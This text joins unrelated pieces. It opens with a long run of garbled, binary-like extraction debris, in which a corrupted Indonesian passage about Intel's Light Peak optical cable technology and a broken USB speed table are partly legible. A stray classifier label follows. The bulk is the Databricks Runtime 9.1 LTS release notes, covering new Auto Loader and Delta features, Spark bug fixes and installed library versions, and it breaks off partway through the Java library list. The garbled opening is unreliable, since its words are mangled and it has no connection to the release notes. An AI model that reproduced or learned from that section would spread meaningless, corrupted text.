(%ð/ # *>(+ $ +  (&&%%$ + ð   ().  (%++%)% &ð  $+% (& ((  +%     &  $%   % &  ( ((  # * "  % $%   % ð / - % (( & $%   ((    ( +  (+)+      (% % $ %+%  ) )(0 % ++% %( r4 + $+%-  % ð    & ((5  % ((% +%%+  %&++&% % % c  $  . .3!Ä   (  >  ++ ++ #/-D*-  $+% (> ++ -D#  *%%ð    + %     (  + +   $+%((&(/2++( +%%$&  %   & (+&  +-  (  C)ðD   %  ' . .3!Ä   ð    - , /&+ +< 555)(5  7%P 2 P>+1-# / * 2.  P%%+(%++/   rK 4 _ 4 +  +  (+%    +     >(+-  &   (+$+ &5    5  + ((   + % (++%  ð   5 14 4‘ %  (   % % +  " ((+ ( %%%(  $+% (   ($   (%  %  /-D&%%++ ,144+  + ( $+(  +ð  (      ' 4 _ 4   ð    - , /&+ +< 555+)(  7%P 2 P>+1-# / * 2.  P%%+(%++/   rr  -   5 ÿ4%Ä  +  % %  % % % %( + +% &2& (( %-  )   & $ + ++  N /  % ((  ð    ((   %+)% " ((+    (  (   (%"+( &(   + %   (   (( % -    (%&+ (+ ð  %%+ (  +  5 B1 %(+)+ #$%%++ð/ +++ð    '   -   5 ÿ4%Ä   ð     , , /&+ +< 555))(5  7%P ðQ  P9(%!(+-# / */ 2 6 P%%+(%++/  rh  6   7 8 K $ US 2.0 K $ US 3.0  Tu   Tu  (0  (0  (0  (0  Adaa Nob  32,56 32,52 131,7 131,2 NH03 Asus Express ox 32,54 32,29 104,3 100,0 Transcend 31,28 31,06 91,82 91,88 SoreJe 25D3 ÿ    _ 8        ne daang dengan novas baru, ekno og cangg n dber nama  . Perangka n akan menghubungkan banyak pera aan dengan kabe fber opc. ne mengk am Lgh Peak akan menggankan US 3.0. n berar kebuuhan por yang sudah umum dm k banyak gadge akan segera ergankan ekno og Lgh Peak. Se$ak seahun a u, Lgh Peak memang sudah dperkena kan o eh ne kepada pub k, namun baru d akhr ahun 2010 n ne akan mu a memproduks ekno og erbarunya u. ne berharap banyak parner ne yang berseda membanu pen$ua annya. Tekno og n memuncu kan kecenderungan rend kabe opc anpa srk. anfaanya ungkap Jusn @aner, kepa a ne Labs, enu sa$a dapa mendukung berbaga prooko , danaraya US dan sera ATA. B%& $ (+ ) 5+%( & + -&%%(+++ %&$ +  B%&  $  &-    +  %-  B%&   ð &   B%&  $++  ($  %  ð  - B%& ((+ð  $ %+  %$%%)%%((%  +-B%& $+%((+(%) ,- & ) ++ (%(  (  +2  ( 5+ %& ( $ B%&  %(  +ð  %((& ++ ((   ) B%&  $+%  (( +  B%& - +(++%%+)(+  ÿ  %    &'00)+ %)(0/ .0 0%2)22&(  &'00555%  )))0/ 0 0(%2+2(&(  &'00555(+)(00(2%%2%2+2  &'00555(+)(00(2%%2%2+2 0& (2/ &'00)(0+2 2 22%2 &2 %&20 ÿr
__label__pos
0.503217
Databricks Runtime 9.1 LTS The following release notes provide information about Databricks Runtime 9.1 LTS and Databricks Runtime 9.1 LTS Photon, powered by Apache Spark 3.1.2. Databricks released these images in September 2021. Photon is in Public Preview. Note LTS means this version is under long-term support. See Long-term support (LTS) lifecycle. New features and improvements Auto Loader schema hints now work with array and map types Array and map types are supported in Override schema inference with schema hints for Auto Loader. Examples of schema hints for arrays include: 1. arr Array<TYPE> changes the array type. 2. arr.element TYPE changes the array type (by using the element keyword). 3. arr.element.x TYPE changes a nested field type in an array of structures. The first two examples are hints to change the type of array arr to TYPE, but they use different syntax. In the third example, arr is an array of structures with a field x. This example shows how to change the type of x to TYPE. Examples of schema hints for maps include: 1. m Map<KEY_TYPE, VALUE_TYPE> changes map key and value types. 2. m.key TYPE changes the type of map keys. 3. m.value TYPE changes the type of map values. 4. m.key.x TYPE changes the field type in a map key. 5. m.value.x TYPE changes the field type of a map value. The first example changes both the key and value types of map m to KEY_TYPE and VALUE_TYPE respectively. The second and third examples can be used if only the key type or only the value type needs to be changed. In the fourth and fifth examples, m is a map with key and value of structure types with a field x. This example shows how to change the type of x to TYPE. Avro file support for merge schema The Avro file format now supports the mergeSchema option when reading files. Setting mergeSchema to true when reading Avro files will infer a schema from a set of Avro files rather than from a single file. This improves usability by inferring a schema that may be able to read all files even if their individual schemas differ. See Configuration. Auto Loader incremental listing support (Public Preview) In the case of lexicographically generated files, What is Auto Loader? now leverages lexical file ordering and existing optimized APIs to make the directory listing more efficient by listing from previously-ingested files rather than by listing the entire directory. Auto Loader automatically detects whether a given directory is suitable for incremental listing by default. To control this behavior explicitly, set the new cloudFiles.useIncrementalListing option to on (true), off (false), or automatic (auto). If you set this behavior to true, you can also set the cloudFiles.backfillInterval option to schedule regular backfills over your data, to make sure all of your data is completely ingested. Delta now supports arbitrary replaceWhere In combination with overwrite mode, the replaceWhere option can be used to simultaneously overwrite data that matches a predicate defined in the option. Previously, replaceWhere supported a predicate only over partition columns, but it can now be an arbitrary expression. See Write to a table. Auto Loader for Google Cloud now supports file notifications (Public Preview) Auto Loader now supports file notification mode on Google Cloud. Set .option("cloudFiles.useNotifications", "true") to allow Auto Loader to automatically set up Google Cloud Pub/Sub resources for you. With file notification mode, new files are detected and ingested as they arrive without listing the input directory. See What is Auto Loader file notification mode?. CREATE FUNCTION now supports creating table functions In addition to creating a scalar function that returns a scalar value, you can now create a table function that returns a set of rows. See CREATE FUNCTION. Kafka Streaming Source now reports estimatedTotalBytesBehindLatest metric The Kafka streaming source now reports an estimate of how many bytes the consumer is behind the latest available byte after every batch. You can use this metric to track stream progress. See Metrics. Example metric output: StreamingQueryProgress { "batchId": 0, ..... "sources": [ { "description" : "KafkaV2[Subscribe[topic-0]]", "metrics":{ "avgOffsetsBehindLatest" : "1.0", "estimatedTotalBytesBehindLatest" : "80.0", // new "maxOffsetsBehindLatest" : "1", "minOffsetsBehindLatest" : "1" } ], .... } For structs inside of arrays, Delta MERGE INTO now resolves struct fields by name and evolves struct schemas Delta MERGE INTO now supports resolution of struct fields by name and automatic schema evolution for arrays of structs. When automatic schema evolution is enabled by setting spark.databricks.delta.schema.autoMerge.enabled to true, UPDATE and INSERT clauses will resolve struct fields inside of an array by name, casting to the corresponding data type that is defined in the target array and filling additional or missing fields in the source or target with null values. When automatic schema evolution is disabled, UPDATE and INSERT clauses will resolve struct fields inside of an array by name but will not be able to evolve the additional fields. See Automatic schema evolution for arrays of structs. Bug fixes • Fixed a memory leak in the Amazon S3 connector that could happen in long running jobs or services, which was caused by JVM DeleteOnExit functionality. Library upgrades • Upgraded Python libraries: • plotly from 4.14.3 to 5.1.0 • Upgraded R libraries: • base from 4.1.0 to 4.1.1 • bslib from 0.2.5.1 to 0.3.0 • cachem from 1.0.5 to 1.0.6 • compiler from 4.1.0 to 4.1.1 • datasets from 4.1.0 to 4.1.1 • future from 1.21.0 to 1.22.1 • gert from 1.3.1 to 1.3.2 • graphics from 4.1.0 to 4.1.1 • grDevices from 4.1.0 to 4.1.1 • grid from 4.1.0 to 4.1.1 • Upgraded Java libraries: • org.eclipse.jetty from 9.4.36.v20210114 to 9.4.42.v20210604 Apache Spark Databricks Runtime 9.1 LTS includes Apache Spark 3.1.2. This release includes all Spark fixes and improvements included in Databricks Runtime 9.0 (Unsupported), as well as the following additional bug fixes and improvements made to Spark: • [SPARK-36674][SQL][CHERRY-PICK] Support ILIKE - case insensitive LIKE • [SPARK-36353][SQL][3.1] RemoveNoopOperators should keep output schema • [SPARK-35876][SQL][3.1] ArraysZip should retain field names to avoid being re-written by analyzer/optimizer • [SPARK-36398][SQL] Redact sensitive information in Spark Thrift Server log • [SPARK-36498][SQL] Reorder inner fields of the input query in byName V2 write • [SPARK-36614][CORE][UI] Correct executor loss reason caused by decommission in UI • [SPARK-36012][SQL] Add null flag in SHOW CREATE TABLE • [SPARK-36509][CORE] Fix the issue that executors are never re-scheduled if the worker stops with standalone cluster • [SPARK-36603][CORE] Use WeakReference not SoftReference in LevelDB • [SPARK-36564][CORE] Fix NullPointerException in LiveRDDDistribution.toApi • [SPARK-36086][SQL][3.1] CollapseProject project replace alias should use origin column name • [SPARK-33527][SQL] Extend the function of decode so as consistent with mainstream databases • [SPARK-36400][SPARK-36398][SQL][WEBUI] Make ThriftServer recognize spark.sql.redaction.string.regex • [SPARK-34054][CORE] BlockManagerDecommissioner code cleanup • [SPARK-36500][CORE] Fix temp_shuffle file leaking when a task is interrupted • [SPARK-36489][SQL] Aggregate functions over no grouping keys, on tables with a single bucket, return multiple rows • [SPARK-36464][CORE] Fix Underlying Size Variable Initialization in ChunkedByteBufferOutputStream for Writing Over 2GB Data • [SPARK-36339][SQL][3.0] References to grouping that not part of aggregation should be replaced • [SPARK-36354][CORE] EventLogFileReader should skip rolling event log directories with no logs • [SPARK-36242][CORE][3.1] Ensure spill file closed before set success = true in ExternalSorter.spillMemoryIteratorToDisk method • [SPARK-36211][PYTHON] Correct typing of udf return value • [SPARK-34222][SQL] Enhance boolean simplification rule • [SPARK-35027][CORE] Close the inputStream in FileAppender when writin… • [SPARK-36269][SQL] Fix only set data columns to Hive column names config • [SPARK-36213][SQL] Normalize PartitionSpec for Describe Table Command with PartitionSpec • [SPARK-36210][SQL] Preserve column insertion order in Dataset.withColumns • [SPARK-36079][SQL] Null-based filter estimate should always be in the range [0, 1] • [SPARK-28266][SQL] convertToLogicalRelation should not interpret path property when reading Hive tables System environment • Operating System: Ubuntu 20.04.4 LTS • Java: Zulu 8.56.0.21-CA-linux64 • Scala: 2.12.10 • Python: 3.8.10 • R: 4.1.1 • Delta Lake: 1.0.0 Installed Python libraries Library Version Library Version Library Version Antergos Linux 2015.10 (ISO-Rolling) appdirs 1.4.4 backcall 0.2.0 boto3 1.16.7 botocore 1.19.7 certifi 2020.12.5 chardet 4.0.0 cycler 0.10.0 Cython 0.29.23 dbus-python 1.2.16 decorator 5.0.6 distlib 0.3.2 distro-info 0.23ubuntu1 facets-overview 1.0.0 filelock 3.0.12 idna 2.10 ipykernel 5.3.4 ipython 7.22.0 ipython-genutils 0.2.0 jedi 0.17.2 jmespath 0.10.0 joblib 1.0.1 jupyter-client 6.1.12 jupyter-core 4.7.1 kiwisolver 1.3.1 koalas 1.8.1 matplotlib 3.4.2 numpy 1.19.2 pandas 1.2.4 parso 0.7.0 patsy 0.5.1 pexpect 4.8.0 pickleshare 0.7.5 Pillow 8.2.0 pip 21.0.1 plotly 5.1.0 prompt-toolkit 3.0.17 protobuf 3.17.2 psycopg2 2.8.5 ptyprocess 0.7.0 pyarrow 4.0.0 Pygments 2.8.1 PyGObject 3.36.0 pyparsing 2.4.7 python-apt 2.0.0+ubuntu0.20.4.5 python-dateutil 2.8.1 pytz 2020.5 pyzmq 20.0.0 requests 2.25.1 requests-unixsocket 0.2.0 s3transfer 0.3.7 scikit-learn 0.24.1 scipy 1.6.2 seaborn 0.11.1 setuptools 52.0.0 six 1.15.0 ssh-import-id 5.10 statsmodels 0.12.2 tenacity 8.0.1 threadpoolctl 2.1.0 tornado 6.1 traitlets 5.0.5 unattended-upgrades 0.1 urllib3 1.25.11 virtualenv 20.4.1 wcwidth 0.2.5 wheel 0.36.2 Installed R libraries R libraries are installed from the Microsoft CRAN snapshot on 2021-09-08. Library Version Library Version Library Version askpass 1.1 assertthat 0.2.1 backports 1.2.1 base 4.1.1 base64enc 0.1-3 bit 4.0.4 bit64 4.0.5 blob 1.2.2 boot 1.3-28 brew 1.0-6 brio 1.1.2 broom 0.7.9 bslib 0.3.0 cachem 1.0.6 callr 3.7.0 caret 6.0-88 cellranger 1.1.0 chron 2.3-56 class 7.3-19 cli 3.0.1 clipr 0.7.1 cluster 2.1.2 codetools 0.2-18 colorspace 2.0-2 commonmark 1.7 compiler 4.1.1 config 0.3.1 cpp11 0.3.1 crayon 1.4.1 credentials 1.3.1 curl 4.3.2 data.table 1.14.0 datasets 4.1.1 DBI 1.1.1 dbplyr 2.1.1 desc 1.3.0 devtools 2.4.2 diffobj 0.3.4 digest 0.6.27 dplyr 1.0.7 dtplyr 1.1.0 ellipsis 0.3.2 evaluate 0.14 fansi 0.5.0 farver 2.1.0 fastmap 1.1.0 forcats 0.5.1 foreach 1.5.1 foreign 0.8-81 forge 0.2.0 fs 1.5.0 future 1.22.1 future.apply 1.8.1 gargle 1.2.0 generics 0.1.0 gert 1.3.2 ggplot2 3.3.5 gh 1.3.0 gitcreds 0.1.1 glmnet 4.1-2 globals 0.14.0 glue 1.4.2 googledrive 2.0.0 googlesheets4 1.0.0 gower 0.2.2 graphics 4.1.1 grDevices 4.1.1 grid 4.1.1 gridExtra 2.3 gsubfn 0.7 gtable 0.3.0 haven 2.4.3 highr 0.9 hms 1.1.0 htmltools 0.5.2 htmlwidgets 1.5.3 httpuv 1.6.2 httr 1.4.2 hwriter 1.3.2 hwriterPlus 1.0-3 ids 1.0.1 ini 0.3.1 ipred 0.9-11 isoband 0.2.5 iterators 1.0.13 jquerylib 0.1.4 jsonlite 1.7.2 KernSmooth 2.23-20 knitr 1.33 labeling 0.4.2 later 1.3.0 lattice 0.20-44 lava 1.6.10 lifecycle 1.0.0 listenv 0.8.0 lubridate 1.7.10 magrittr 2.0.1 markdown 1.1 MASS 7.3-54 Matrix 1.3-4 memoise 2.0.0 methods 4.1.1 mgcv 1.8-36 mime 0.11 ModelMetrics 1.2.2.2 modelr 0.1.8 munsell 0.5.0 nlme 3.1-152 nnet 7.3-16 numDeriv 2016.8-1.1 openssl 1.4.5 parallel 4.1.1 parallelly 1.27.0 pillar 1.6.2 pkgbuild 1.2.0 pkgconfig 2.0.3 pkgload 1.2.1 plogr 0.2.0 plyr 1.8.6 praise 1.0.0 prettyunits 1.1.1 pROC 1.18.0 processx 3.5.2 prodlim 2019.11.13 progress 1.2.2 progressr 0.8.0 promises 1.2.0.1 proto 1.0.0 ps 1.6.0 purrr 0.3.4 r2d3 0.2.5 R6 2.5.1 randomForest 4.6-14 rappdirs 0.3.3 rcmdcheck 1.3.3 RColorBrewer 1.1-2 Rcpp 1.0.7 readr 2.0.1 readxl 1.3.1 recipes 0.1.16 rematch 1.0.1 rematch2 2.1.2 remotes 2.4.0 reprex 2.0.1 reshape2 1.4.4 rlang 0.4.11 rmarkdown 2.10 RODBC 1.3-18 roxygen2 7.1.1 rpart 4.1-15 rprojroot 2.0.2 Rserve 1.8-8 RSQLite 2.2.8 rstudioapi 0.13 rversions 2.1.1 rvest 1.0.1 sass 0.4.0 scales 1.1.1 selectr 0.4-2 sessioninfo 1.1.1 shape 1.4.6 shiny 1.6.0 sourcetools 0.1.7 sparklyr 1.7.1 SparkR 3.1.1 spatial 7.3-11 splines 4.1.1 sqldf 0.4-11 SQUAREM 2021.1 stats 4.1.1 stats4 4.1.1 stringi 1.7.4 stringr 1.4.0 survival 3.2-13 sys 3.4 tcltk 4.1.1 TeachingDemos 2.10 testthat 3.0.4 tibble 3.1.4 tidyr 1.1.3 tidyselect 1.1.1 tidyverse 1.3.1 timeDate 3043.102 tinytex 0.33 tools 4.1.1 tzdb 0.1.2 usethis 2.0.1 utf8 1.2.2 utils 4.1.1 uuid 0.1-4 vctrs 0.3.8 viridisLite 0.4.0 vroom 1.5.4 waldo 0.3.0 whisker 0.4 withr 2.4.2 xfun 0.25 xml2 1.3.2 xopen 1.0.0 xtable 1.8-4 yaml 2.2.1 zip 2.2.0 Installed Java and Scala libraries (Scala 2.12 cluster version) Group ID Artifact ID Version antlr antlr 2.7.7 com.amazonaws amazon-kinesis-client 1.12.0 com.amazonaws aws-java-sdk-autoscaling 1.11.655 com.amazonaws aws-java-sdk-cloudformation 1.11.655 com.amazonaws aws-java-sdk-cloudfront 1.11.655 com.amazonaws aws-java-sdk-cloudhsm 1.11.655 com.amazonaws aws-java-sdk-cloudsearch 1.11.655 com.amazonaws aws-java-sdk-cloudtrail 1.11.655 com.amazonaws aws-java-sdk-cloudwatch 1.11.655 com.amazonaws aws-java-sdk-cloudwatchmetrics 1.11.655 com.amazonaws aws-java-sdk-codedeploy 1.11.655 com.amazonaws aws-java-sdk-cognitoidentity 1.11.655 com.amazonaws aws-java-sdk-cognitosync 1.11.655 com.amazonaws aws-java-sdk-config 1.11.655 com.amazonaws aws-java-sdk-core 1.11.655 com.amazonaws aws-java-sdk-datapipeline 1.11.655 com.amazonaws aws-java-sdk-directconnect 1.11.655 com.amazonaws aws-java-sdk-directory 1.11.655 com.amazonaws aws-java-sdk-dynamodb 1.11.655 com.amazonaws aws-java-sdk-ec2 1.11.655 com.amazonaws aws-java-sdk-ecs 1.11.655 com.amazonaws aws-java-sdk-efs 1.11.655 com.amazonaws aws-java-sdk-elasticache 1.11.655 com.amazonaws aws-java-sdk-elasticbeanstalk 1.11.655 com.amazonaws aws-java-sdk-elasticloadbalancing 1.11.655 com.amazonaws aws-java-sdk-elastictranscoder 1.11.655 com.amazonaws aws-java-sdk-emr 1.11.655 com.amazonaws aws-java-sdk-glacier 1.11.655 com.amazonaws aws-java-sdk-glue 1.11.655 com.amazonaws aws-java-sdk-iam 1.11.655 com.amazonaws aws-java-sdk-importexport 1.11.655 com.amazonaws aws-java-sdk-kinesis 1.11.655 com.amazonaws aws-java-sdk-kms 1.11.655 com.amazonaws aws-java-sdk-lambda 1.11.655 com.amazonaws aws-java-sdk-logs 1.11.655 com.amazonaws aws-java-sdk-machinelearning 1.11.655 com.amazonaws aws-java-sdk-marketplacecommerceanalytics 1.11.655 com.amazonaws aws-java-sdk-marketplacemeteringservice 1.11.655 com.amazonaws aws-java-sdk-opsworks 1.11.655 com.amazonaws aws-java-sdk-rds 1.11.655 com.amazonaws aws-java-sdk-redshift 1.11.655 com.amazonaws aws-java-sdk-route53 1.11.655 com.amazonaws aws-java-sdk-s3 1.11.655 com.amazonaws aws-java-sdk-ses 1.11.655 com.amazonaws aws-java-sdk-simpledb 1.11.655 com.amazonaws aws-java-sdk-simpleworkflow 1.11.655 com.amazonaws aws-java-sdk-sns 1.11.655 com.amazonaws aws-java-sdk-sqs 1.11.655 com.amazonaws aws-java-sdk-ssm 1.11.655 com.amazonaws aws-java-sdk-storagegateway 1.11.655 com.amazonaws aws-java-sdk-sts 1.11.655 com.amazonaws aws-java-sdk-support 1.11.655 com.amazonaws aws-java-sdk-swf-libraries 1.11.22 com.amazonaws aws-java-sdk-workspaces 1.11.655 com.amazonaws jmespath-java 1.11.655 com.chuusai shapeless_2.12 2.3.3 com.clearspring.analytics stream 2.9.6 com.databricks Rserve 1.8-3 com.databricks jets3t 0.7.1-0 com.databricks.scalapb compilerplugin_2.12 0.4.15-10 com.databricks.scalapb scalapb-runtime_2.12 0.4.15-10 com.esotericsoftware kryo-shaded 4.0.2 com.esotericsoftware minlog 1.3.0 com.fasterxml classmate 1.3.4 com.fasterxml.jackson.core jackson-annotations 2.10.0 com.fasterxml.jackson.core jackson-core 2.10.0 com.fasterxml.jackson.core jackson-databind 2.10.0 com.fasterxml.jackson.dataformat jackson-dataformat-cbor 2.10.0 com.fasterxml.jackson.datatype jackson-datatype-joda 2.10.0 com.fasterxml.jackson.module jackson-module-paranamer 2.10.0 com.fasterxml.jackson.module jackson-module-scala_2.12 2.10.0 com.github.ben-manes.caffeine caffeine 2.3.4 com.github.fommil jniloader 1.1 com.github.fommil.netlib core 1.1.2 com.github.fommil.netlib native_ref-java 1.1 com.github.fommil.netlib native_ref-java-natives 1.1 com.github.fommil.netlib native_system-java 1.1 com.github.fommil.netlib native_system-java-natives 1.1 com.github.fommil.netlib netlib-native_ref-linux-x86_64-natives 1.1 com.github.fommil.netlib netlib-native_system-linux-x86_64-natives 1.1 com.github.joshelser dropwizard-metrics-hadoop-metrics2-reporter 0.1.2 com.github.luben zstd-jni 1.4.8-1 com.github.wendykierp JTransforms 3.1 com.google.code.findbugs jsr305 3.0.0 com.google.code.gson gson 2.2.4 com.google.crypto.tink tink 1.6.0 com.google.flatbuffers flatbuffers-java 1.9.0 com.google.guava guava 15.0 com.google.protobuf protobuf-java 2.6.1 com.h2database h2 1.4.195 com.helger profiler 1.1.1 com.jcraft jsch 0.1.50 com.jolbox bonecp 0.8.0.RELEASE com.lihaoyi sourcecode_2.12 0.1.9 com.microsoft.azure azure-data-lake-store-sdk 2.3.9 com.microsoft.sqlserver mssql-jdbc 9.2.1.jre8 com.ning compress-lzf 1.0.3 com.sun.mail javax.mail 1.5.2 com.tdunning json 1.8 com.thoughtworks.paranamer paranamer 2.8 com.trueaccord.lenses lenses_2.12 0.4.12 com.twitter chill-java 0.9.5 com.twitter chill_2.12 0.9.5 com.twitter util-app_2.12 7.1.0 com.twitter util-core_2.12 7.1.0 com.twitter util-function_2.12 7.1.0 com.twitter util-jvm_2.12 7.1.0 com.twitter util-lint_2.12 7.1.0 com.twitter util-registry_2.12 7.1.0 com.twitter util-stats_2.12 7.1.0 com.typesafe config 1.2.1 com.typesafe.scala-logging scala-logging_2.12 3.7.2 com.univocity univocity-parsers 2.9.1 com.zaxxer HikariCP 3.1.0 commons-beanutils commons-beanutils 1.9.4 commons-cli commons-cli 1.2 commons-codec commons-codec 1.10 commons-collections commons-collections 3.2.2 commons-configuration commons-configuration 1.6 commons-dbcp commons-dbcp 1.4 commons-digester commons-digester 1.8 commons-fileupload commons-fileupload 1.3.3 commons-httpclient commons-httpclient 3.1 commons-io commons-io 2.4 commons-lang commons-lang 2.6 commons-logging commons-logging 1.1.3 commons-net commons-net 3.1 commons-pool commons-pool 1.5.4 hive-2.3__hadoop-2.7 jets3t-0.7 liball_deps_2.12 hive-2.3__hadoop-2.7 zookeeper-3.4 liball_deps_2.12 info.ganglia.gmetric4j gmetric4j 1.0.10 io.airlift aircompressor 0.10 io.delta delta-sharing-spark_2.12 0.1.0 io.dropwizard.metrics metrics-core 4.1.1 io.dropwizard.metrics metrics-graphite 4.1.1 io.dropwizard.metrics metrics-healthchecks 4.1.1 io.dropwizard.metrics metrics-jetty9 4.1.1 io.dropwizard.metrics metrics-jmx 4.1.1 io.dropwizard.metrics metrics-json 4.1.1 io.dropwizard.metrics metrics-jvm 4.1.1 io.dropwizard.metrics metrics-servlets 4.1.1 io.netty netty-all 4.1.51.Final io.prometheus simpleclient 0.7.0 io.prometheus simpleclient_common 0.7.0 io.prometheus simpleclient_dropwizard 0.7.0 io.prometheus simpleclient_pushgateway 0.7.0 io.prometheus simpleclient_servlet 0.7.0 io.prometheus.jmx collector 0.12.0 jakarta.annotation jakarta.annotation-api 1.3.5 jakarta.validation jakarta.validation-api 2.0.2 jakarta.ws.rs jakarta.ws.rs-api 2.1.6 javax.activation activation 1.1.1 javax.el javax.el-api 2.2.4 javax.jdo jdo-api 3.0.1 javax.servlet javax.servlet-api 3.1.0 javax.servlet.jsp jsp-api 2.1 javax.transaction jta 1.1 javax.transaction transaction-api 1.1 javax.xml.bind jaxb-api 2.2.2 javax.xml.stream stax-api 1.0-2 javolution javolution 5.5.1 jline jline 2.14.6 joda-time joda-time 2.10.5 log4j apache-log4j-extras 1.2.17 log4j log4j 1.2.17 maven-trees hive-2.3__hadoop-2.7 liball_deps_2.12 net.java.dev.jna jna 5.8.0 net.razorvine pyrolite 4.30 net.sf.jpam jpam 1.1 net.sf.opencsv opencsv 2.3 net.sf.supercsv super-csv 2.2.0 net.snowflake snowflake-ingest-sdk 0.9.6 net.snowflake snowflake-jdbc 3.13.3 net.snowflake spark-snowflake_2.12 2.9.0-spark_3.1 net.sourceforge.f2j arpack_combined_all 0.1 org.acplt.remotetea remotetea-oncrpc 1.1.2 org.antlr ST4 4.0.4 org.antlr antlr-runtime 3.5.2 org.antlr antlr4-runtime 4.8-1 org.antlr stringtemplate 3.2.1 org.apache.ant ant 1.9.2 org.apache.ant ant-jsch 1.9.2 org.apache.ant ant-launcher 1.9.2 org.apache.arrow arrow-format 2.0.0 org.apache.arrow arrow-memory-core 2.0.0 org.apache.arrow arrow-memory-netty 2.0.0 org.apache.arrow arrow-vector 2.0.0 org.apache.avro avro 1.8.2 org.apache.avro avro-ipc 1.8.2 org.apache.avro avro-mapred-hadoop2 1.8.2 org.apache.commons commons-compress 1.20 org.apache.commons commons-crypto 1.1.0 org.apache.commons commons-lang3 3.10 org.apache.commons commons-math3 3.4.1 org.apache.commons commons-text 1.6 org.apache.curator curator-client 2.7.1 org.apache.curator curator-framework 2.7.1 org.apache.curator curator-recipes 2.7.1 org.apache.derby derby 10.12.1.1 org.apache.directory.api api-asn1-api 1.0.0-M20 org.apache.directory.api api-util 1.0.0-M20 org.apache.directory.server apacheds-i18n 2.0.0-M15 org.apache.directory.server apacheds-kerberos-codec 2.0.0-M15 org.apache.hadoop hadoop-annotations 2.7.4 org.apache.hadoop hadoop-auth 2.7.4 org.apache.hadoop hadoop-client 2.7.4 org.apache.hadoop hadoop-common 2.7.4 org.apache.hadoop hadoop-hdfs 2.7.4 org.apache.hadoop hadoop-mapreduce-client-app 2.7.4 org.apache.hadoop hadoop-mapreduce-client-common 2.7.4 org.apache.hadoop hadoop-mapreduce-client-core 2.7.4 org.apache.hadoop hadoop-mapreduce-client-jobclient 2.7.4 org.apache.hadoop hadoop-mapreduce-client-shuffle 2.7.4 org.apache.hadoop hadoop-yarn-api 2.7.4 org.apache.hadoop hadoop-yarn-client 2.7.4 org.apache.hadoop hadoop-yarn-common 2.7.4 org.apache.hadoop hadoop-yarn-server-common 2.7.4 org.apache.hive hive-beeline 2.3.7 org.apache.hive hive-cli 2.3.7 org.apache.hive hive-jdbc 2.3.7 org.apache.hive hive-llap-client 2.3.7 org.apache.hive hive-llap-common 2.3.7 org.apache.hive hive-serde 2.3.7 org.apache.hive hive-shims 2.3.7 org.apache.hive hive-storage-api 2.7.2 org.apache.hive.shims hive-shims-0.23 2.3.7 org.apache.hive.shims hive-shims-common 2.3.7 org.apache.hive.shims hive-shims-scheduler 2.3.7 org.apache.htrace htrace-core 3.1.0-incubating org.apache.httpcomponents httpclient 4.5.6 org.apache.httpcomponents httpcore 4.4.12 org.apache.ivy ivy 2.4.0 org.apache.mesos mesos-shaded-protobuf 1.4.0 org.apache.orc orc-core 1.5.12 org.apache.orc orc-mapreduce 1.5.12 org.apache.orc orc-shims 1.5.12 org.apache.parquet parquet-column 1.10.1-databricks9 org.apache.parquet parquet-common 1.10.1-databricks9 org.apache.parquet parquet-encoding 1.10.1-databricks9 org.apache.parquet parquet-format 2.4.0 org.apache.parquet parquet-hadoop 1.10.1-databricks9 org.apache.parquet parquet-jackson 1.10.1-databricks9 org.apache.thrift libfb303 0.9.3 org.apache.thrift libthrift 0.12.0 org.apache.xbean xbean-asm7-shaded 4.15 org.apache.yetus audience-annotations 0.5.0 org.apache.zookeeper zookeeper 3.4.14 org.codehaus.jackson jackson-core-asl 1.9.13 org.codehaus.jackson jackson-jaxrs 1.9.13 org.codehaus.jackson jackson-mapper-asl 1.9.13 org.codehaus.jackson jackson-xc 1.9.13 org.codehaus.janino commons-compiler 3.0.16 org.codehaus.janino janino 3.0.16 org.datanucleus datanucleus-api-jdo 4.2.4 org.datanucleus datanucleus-core 4.1.17 org.datanucleus datanucleus-rdbms 4.1.19 org.datanucleus javax.jdo 3.2.0-m3 org.eclipse.jetty jetty-client 9.4.42.v20210604 org.eclipse.jetty jetty-continuation 9.4.42.v20210604 org.eclipse.jetty jetty-http 9.4.42.v20210604 org.eclipse.jetty jetty-io 9.4.42.v20210604 org.eclipse.jetty jetty-jndi 9.4.42.v20210604 org.eclipse.jetty jetty-plus 9.4.42.v20210604 org.eclipse.jetty jetty-proxy 9.4.42.v20210604 org.eclipse.jetty jetty-security 9.4.42.v20210604 org.eclipse.jetty jetty-server 9.4.42.v20210604 org.eclipse.jetty jetty-servlet 9.4.42.v20210604 org.eclipse.jetty jetty-servlets 9.4.42.v20210604 org.eclipse.jetty jetty-util 9.4.42.v20210604 org.eclipse.jetty jetty-util-ajax 9.4.42.v20210604 org.eclipse.jetty jetty-webapp 9.4.42.v20210604 org.eclipse.jetty jetty-xml 9.4.42.v20210604 org.eclipse.jetty.websocket websocket-api 9.4.42.v20210604 org.eclipse.jetty.websocket websocket-client 9.4.42.v20210604 org.eclipse.jetty.websocket websocket-common 9.4.42.v20210604 org.eclipse.jetty.websocket websocket-server 9.4.42.v20210604 org.eclipse.jetty.websocket websocket-servlet 9.4.42.v20210604 org.fusesource.leveldbjni leveldbjni-all 1.8 org.glassfish.hk2 hk2-api 2.6.1 org.glassfish.hk2 hk2-locator 2.6.1 org.glassfish.hk2 hk2-utils 2.6.1 org.glassfish.hk2 osgi-resource-locator 1.0.3 org.glassfish.hk2.external aopalliance-repackaged 2.6.1 org.glassfish.hk2.external jakarta.inject 2.6.1 org.glassfish.jersey.containers jersey-container-servlet 2.30 org.glassfish.jersey.containers jersey-container-servlet-core 2.30 org.glassfish.jersey.core jersey-client 2.30 org.glassfish.jersey.core jersey-common 2.30 org.glassfish.jersey.core jersey-server 2.30 org.glassfish.jersey.inject jersey-hk2 2.30 org.glassfish.jersey.media jersey-media-jaxb 2.30 org.hibernate.validator hibernate-validator 6.1.0.Final org.javassist javassist 3.25.0-GA org.jboss.logging jboss-logging 3.3.2.Final org.jdbi jdbi 2.63.1 org.joda joda-convert 1.7 org.jodd jodd-core 3.5.2 org.json4s json4s-ast_2.12 3.7.0-M5 org.json4s json4s-core_2.12 3.7.0-M5 org.json4s json4s-jackson_2.12 3.7.0-M5 org.json4s json4s-scalap_2.12 3.7.0-M5 org.lz4 lz4-java 1.7.1 org.mariadb.jdbc mariadb-java-client 2.2.5 org.objenesis objenesis 2.5.1 org.postgresql postgresql 42.1.4 org.roaringbitmap RoaringBitmap 0.9.14 org.roaringbitmap shims 0.9.14 org.rocksdb rocksdbjni 6.20.3 org.rosuda.REngine REngine 2.1.0 org.scala-lang scala-compiler_2.12 2.12.10 org.scala-lang scala-library_2.12 2.12.10 org.scala-lang scala-reflect_2.12 2.12.10 